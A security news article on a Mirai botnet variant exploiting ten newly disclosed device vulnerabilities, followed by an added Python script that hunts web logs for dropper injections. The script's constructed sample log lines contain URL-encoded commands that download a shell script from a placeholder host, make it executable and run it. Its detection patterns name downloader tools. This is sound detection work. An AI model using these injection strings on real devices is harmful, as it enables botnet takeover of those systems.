New Mirai Variant Leverages 10 Vulnerabilities to Hijack IoT Devices
Over the past month, a variant of the Mirai botnet was observed targeting newly disclosed security vulnerabilities within hours of their public disclosure, researchers with Palo Alto Networks reveal.
Active since 2016, Mirai had its source code leaked online shortly after it emerged, which has resulted in dozens of variants being released over the years, each with its own set of targets.
What makes the variant tracked by Palo Alto Networks stand out in the crowd is that, within a four-week timeframe, it began exploiting several vulnerabilities disclosed this year, in some cases on the day of disclosure. That leaves defenders with hours rather than weeks to patch or isolate internet-exposed management interfaces before they are swept into the botnet.
On February 23, the Mirai variant was observed targeting CVE-2021-27561 and CVE-2021-27562, two vulnerabilities in the Yealink DM (Device Management) platform that had been disclosed the very same day.
Impacting Yealink DM version 3.6.0.20 and older, the flaws (a pre-auth SSRF and a command injection, respectively) exist because user-provided data is not properly filtered, and they can be chained to execute arbitrary commands as root without authentication.
On March 3, Palo Alto Networks’ security researchers noticed that the same samples were also using an exploit for CVE-2021-22502, a critical (CVSS score of 9.8) remote code execution vulnerability in Micro Focus Operations Bridge Reporter.
Exploitable without authentication, the security bug exists because the user-supplied Token parameter is not properly validated when the LogonResource endpoint handles it, allowing an unauthenticated attacker to execute code as root.
Ten days later, on March 13, the samples also incorporated an exploit targeting CVE-2020-26919, a critical vulnerability (CVSS score 9.8) affecting NETGEAR JGS516PE business-grade gigabit switches. The bug is described as “lack of access control at the function level.”
In September 2020, Netgear published an advisory for this vulnerability, advising customers to update the firmware on their devices.
Other vulnerabilities exploited in these attacks include a SonicWall SSL-VPN bug referred to as VisualDoor, CVE-2020-25506 (D-Link DNS-320 NAS) and CVE-2019-19356 (Netis WF2419 wireless router), alongside the NETGEAR ProSAFE Plus flaw CVE-2020-26919 mentioned above. Three other security issues are also being exploited, but their targets have not been identified yet.
“The attacks are still ongoing at the time of this writing. Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” Palo Alto Networks reveals.
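The post-exploitation behaviour quoted above (an injected command that fetches a shell script, marks it executable and runs it) is the part of these attacks that is easiest to hunt for in web-server access logs, regardless of which of the ten vulnerabilities was used. The following is an added example, not code from the Palo Alto Networks report or from this article: it parses common-format access log lines, URL-decodes the request target (repeatedly, because attackers double-encode to evade single-pass filters), and flags requests that combine a downloader, shell metacharacters and a staging step. The log lines, request paths and IP addresses are constructed stand-ins; only the generic wget/curl, chmod, sh dropper pattern is taken from the described behaviour.

```python
"""Hunt web-server access logs for Mirai-style shell-script dropper injection.

Added example, not from the Palo Alto Networks report. The exploit requests
below are constructed stand-ins (placeholder CGI paths, documentation-range
IPs); only the injected download-chmod-execute pattern is the generic
behaviour described in the article.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log (Apache/nginx common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Feb/2021:10:14:02 +0000] "POST /device/api HTTP/1.1" 200 51 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2021:10:14:03 +0000] "GET /cgi-bin/example.cgi?cmd=ping%20127.0.0.1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbins.sh%20-O%20%2Ftmp%2Fx.sh%3Bchmod%20777%20%2Ftmp%2Fx.sh%3Bsh%20%2Ftmp%2Fx.sh HTTP/1.1" 200 13 "-" "Mozilla/5.0"
198.51.100.22 - - [23/Feb/2021:10:15:44 +0000] "GET /index.html HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.22 - - [23/Feb/2021:10:16:01 +0000] "POST /login?token=abc123 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2021:10:17:30 +0000] "GET /cgi-bin/example.cgi?cmd=%60curl+-s+http://198.51.100.9/m.sh+|+sh%60 HTTP/1.1" 200 13 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators, all checked against the fully URL-decoded request target.
DOWNLOADERS = re.compile(r'\b(?:wget|curl|tftp|ftpget|busybox\s+wget)\b')
SHELL_META = re.compile(r'[;|`&]|\$\(')
STAGING = re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\b|\b(?:sh|bash)\s+/|/tmp/|/var/tmp/')
SCRIPT_URL = re.compile(r'(?:https?|tftp)://([A-Za-z0-9.\-:]+)/\S*?\.sh\b')


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so that
    double-encoded payloads such as %2524%2528 are still seen as $(."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str) -> set:
    """Return the set of dropper indicators found in a request target, or an
    empty set. A downloader keyword alone is too weak (it appears in benign
    API names), so it must co-occur with injection syntax or a staging step."""
    text = decode_fully(target)
    hits = set()
    if DOWNLOADERS.search(text):
        hits.add("downloader")
    if SHELL_META.search(text):
        hits.add("shell-metachar")
    if STAGING.search(text):
        hits.add("staging")
    if "downloader" in hits and hits & {"shell-metachar", "staging"}:
        return hits
    return set()


def parse_line(line: str):
    """Split one common-log-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str) -> list:
    """Return one finding per suspicious request: source, time, decoded
    target, indicators hit and the host the shell script was fetched from."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        hits = classify_request(rec["target"])
        if not hits:
            continue
        decoded = decode_fully(rec["target"])
        url = SCRIPT_URL.search(decoded)
        findings.append({
            "src": rec["src"], "ts": rec["ts"], "status": rec["status"],
            "target": decoded, "indicators": sorted(hits),
            "dropper_host": url.group(1) if url else None,
        })
    return findings


def dropper_hosts(findings: list) -> set:
    """Distinct payload-hosting servers seen across findings, for blocking/pivoting."""
    return {f["dropper_host"] for f in findings if f["dropper_host"]}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['src']} {f['indicators']} -> {f['target']}")
    print("dropper hosts:", sorted(dropper_hosts(found)))
```

A 200 response to such a request is not proof of compromise (many CGI handlers return 200 regardless), so the findings are a triage list: pivot on the source IP, the payload host and any outbound connection from the device to that host around the same timestamp. Legitimate traffic can contain `curl` or `/tmp/` in a parameter, which is why the rule requires the downloader keyword to co-occur with a second indicator rather than alerting on it alone.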